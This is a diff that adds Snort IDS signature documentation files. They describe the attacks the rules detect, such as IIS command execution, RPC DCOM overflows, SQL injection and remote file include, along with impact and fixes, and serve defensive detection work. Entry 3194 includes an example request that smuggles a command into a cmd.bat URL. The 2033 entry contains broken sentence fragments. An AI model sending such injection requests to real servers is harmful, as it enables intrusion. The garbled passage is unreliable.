+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/3194.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+3194
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Internet Information Server.
+
+--
+Impact:
+Serious. Code execution leading to unauthorized administrative access
+on the target host.
+
+--
+Detailed Information:
+Microsoft IIS contains a programming error that may allow an attacker to
+execute commands of their choosing on a vulnerable system. If a valid
+request for an executable file on the system is made, the server will
+honor the request and execute any commands sent to the system. It may be
+possible for an attacker to execute system commands sent to cmd.exe or
+an executable batch file (.bat) for example.
+
+--
+Affected Systems:
+	Microsoft IIS 4.0
+	Microsoft IIS 5.0
+
+--
+Attack Scenarios:
+An attacker can send a request to an executable file on the system and
+supply command arguments of their choice to the file. The server will
+honor the request and execute the attackers commands.
+
+For example, http://www.target.com/scripts/cmd.bat"+&+somecommand
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1091.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1091
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000544.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+100000544
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection 
+vulnerability in the "Dating Agent" application running on a webserver. Access 
+to the file "search.php" with SQL commands being passed as the "relationship" 
+parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a 
+remote machine via the "relationship" parameter in the "search.php" script used 
+by the "Dating Agent" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to compromise the database backend for the 
+application, the attacker may also be able to execute system binaries or 
+malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Dating Agent
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application 
+if user input is not correctly sanitized or checked before passing that input 
+to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/478.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+
+Sid:
+478
+
+--
+
+Summary:
+This event is generated when Broadscan Smurf Scanner generates an ICMP echo
+request message.
+
+--
+
+Impact:
+ICMP echo requests are used to determine if a host is running at a
+specific IP address.  A remote attacker can scan a large range of hosts
+using ICMP echo requests to determine what hosts are operational on the
+network.
+
+--
+
+Detailed Information:
+The Broadscan Smurf Scanner generates an ICMP echo packet with a specific
+datagram signature.  
+
+--
+
+Attack Scenarios:
+A remote attacker might scan a large range of hosts using ICMP echo
+requests to determine what hosts are operational on the network.
+
+--
+
+Ease of Attack:
+Simple.  Packet generation tools can generate this type of ICMP packet
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+Packet generation tools can generate ICMP echo requests with
+user-defined payloads.  This could allow attackers to replace this
+signature with binary values and conceal their operating system.
+
+--
+
+Corrective Action:
+To prevent information gathering, use a firewall to block incoming ICMP
+Type 8 Code 0 traffic.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3328.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3328
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1511.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1511
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2832.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2832
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure do_deferred_repcat_admin
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1691.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1691
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1101.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1101
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000623.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000623
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "menu.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the "menu.php" script 
+used by the "Indexu" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/3364.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3364
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000422.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000422
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpBB" application running on a webserver. Access to the file "template.php" using a remote file being passed as the "page" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "page" parameter in the "template.php" script used by the "phpBB" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpBB
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/421.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+421
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Mobile Registration Reply datagram.
+
+--
+
+Impact:
+ICMP Mobile Registration Reply were never implemented and have been replaced by UDP and TCP versions of the message.  ICMP Type 36 datagrams should never be seen in normal network conditions.
+
+--
+
+Detailed Information:
+ICMP Mobile Registration Reply datagrams were developed before the approval of RFC3344 (IP Mobility Support for IPv4).  Therefore these types of ICMP datagrams should never be seen in normal networking conditions.  
+
+--
+
+Attack Scenarios:
+None known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+ICMP Type 36 datagrams are not normal network activity.  Hosts generating these types of datagrams should be investigated for nefarious activity
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2705.txt
@@ -0,0 +1,75 @@
+Rule: 
+
+--
+Sid: 
+2705
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft GDI using a malformed JPEG image.
+
+-- 
+
+Impact: 
+Serious. Execution of arbitrary code is possible. Denial of Service
+(DoS),
+
+--
+Detailed Information:
+The Microsoft Graphics Device Interface contains a programming error
+in the handling of Joint Photographics Experts Group (JPEG) files. This
+error may allow an attacker to execute code of their choosing on a
+vulnerable system.
+
+Due to the popularity of jpeg files, and in order to provide accurate
+detection for the GDI JPEG vulnerability, sid 2705 may generate false
+positive events in certain situations. Since this rule may generate
+a number of false positives it is disabled by default.
+
+In order to avoid potential evasion techniques, http_inspect should be
+configured with "flow_depth 0" so that all HTTP server response traffic is
+inspected.
+
+WARNING
+Setting flow_depth 0 will cause performance problems in some situations.
+WARNING
+
+--
+Affected Systems:
+	All Microsoft systems including multiple Microsoft products
+
+--
+Attack Scenarios: 
+An attacker would need to supply a malformed jpeg image to a victim and
+have the use attempt to view the file.
+
+-- 
+Ease of Attack: 
+Medium.
+
+-- 
+
+False Positives:
+False positive events are known to occur with this rule, the incidence
+is low but may be an inconvenience in some installations.
+
+--
+False Negatives:
+None known.
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2084.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+2084
+
+--
+Summary:
+xfsmd
+
+--
+Impact:
+Possible root access and code execution.
+
+--
+Detailed Information:
+It is possible for an attacker to exploit some versions of the xfsmd 
+daemon.
+
+Due to a programming error, the service does not correctly check for 
+certain meta-characters and they are not stripped from the request.
+
+The xfsmd daemon is not installed by default on IRIX systems but it is 
+part of an optional package.
+
+--
+Affected Systems:
+	IRIX 6.2
+	IRIX 6.3
+	IRIX 6.4
+	IRIX 6.5.x
+
+--
+Attack Scenarios:
+Exploits are widely available.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Patches are NOT available for this issue.
+
+Disable and remove the xfsmd daemon.
+
+Uprade to the latest non affected version of the operating system
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/5075
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0359
+
+SGI IRIX:
+ftp://patches.sgi.com/support/free/security/advisories/20020606-01-I
+
+--
--- /dev/null
+++ b/doc/signatures/819.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+819
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/669.txt
@@ -0,0 +1,58 @@
+Rule:
+
+--
+Sid:
+669
+
+--
+Summary:
+This event is generated when an external attacker attempts to exploit a vulnerability in Sendmail, where linefeed characters in ident messages are not properly parsed.
+
+--
+Impact:
+Severe. Remote execution of arbitrary code, leading to remote root compromise. 
+
+--
+Detailed Information:
+Sendmail 8.6.10 and earlier versions contain a vulnerability related to the parsing of linefeed characters in commands passed from ident to Sendmail. An attacker can use a specially crafted command with linefeeds in an ident response to Sendmail. The message is not properly parsed and Sendmail forwards the response, with included commands, to its queue. The commands are then executed while the message awaits delivery in the Sendmail queue, causing the included arbitrary code to be executed on the server in the security context of Sendmail. 
+
+--
+Affected Systems:
+Systems running unpatched versions of Sendmail 8.6.10 or earlier.
+
+--
+Attack Scenarios:
+An attacker sends an email with linefeed characters and includes a path variable of P=/bin/sh. Directives included in the transmission are executed while the message remains in the Sendmail queue.
+
+--
+Ease of Attack:
+Moderate. Multiple exploits exist, but the window of opportunity is small; the vulnerability must be exploited while the message is queued for delivery and must have sufficient time (the mail server must be busy/slow) to execute the commands.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest version of Sendmail.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0204
+
+Bugtraq
+http://www.securityfocus.com/bid/2311
+
+--
--- /dev/null
+++ b/doc/signatures/100000826.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000826
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Phorum" application running on a webserver. Access to the file "search.php" with SQL commands being passed as the "mode" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "mode" parameter in the "search.php" script used by the "Phorum" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Phorum
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/2033.txt
@@ -0,0 +1,85 @@
+Rule:
+
+--
+Sid:
+2033
+
+--
+Summary:
+A request has been made to rpc.ypserv from an external source that 
+should not have access to this service. This may be indicative of an 
+intelligence gathering activity as a prelude to a more serious 
+compromise of system resources.
+
+service against the target host.
+
+--
+Impact:
+Disclosure of sensitive system information to an unauthorized user.
+Possible denial of service.
+
+--
+Detailed Information:
+The rpc.ypserv daemon queries information in the local NIS maps. A 
+response to this query may divulge important information to the user 
+performing the query. This could lead to futher exploitation of 
+resources on the network.
+
+In addition, a vulnerability exists in ypserv on some Linux platforms 
+that could lead to a buffer overflow and root compromise of the target 
+host. This is achieved by making a multitude of requests for a NIS map 
+that does not exist.
+
+--
+Affected Systems:
+Multiple systems running versions of ypserv prior to 2.5.
+
+--
+Attack Scenarios:
+The attacker can craft a malicious request to rpc.ypserv such that 
+valuable information can be returned to the attacker.
+
+In the case of a buffer overflow, the attacker might issue a large 
+therefore, be seen many times.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow all RPC requests from external sources and use a firewall to 
+block access to RPC ports from outside the LAN.
+
+Upgrade ypserv to the latest version.
+
+Use /var/yp/securenets to list the hosts allowed to access this resource
+where appropriate.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/6016
+http://www.securityfocus.com/bid/5914
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1232
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1043
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1042
+
+--
--- /dev/null
+++ b/doc/signatures/1313.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1313
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "up skirt".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "up skirt".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
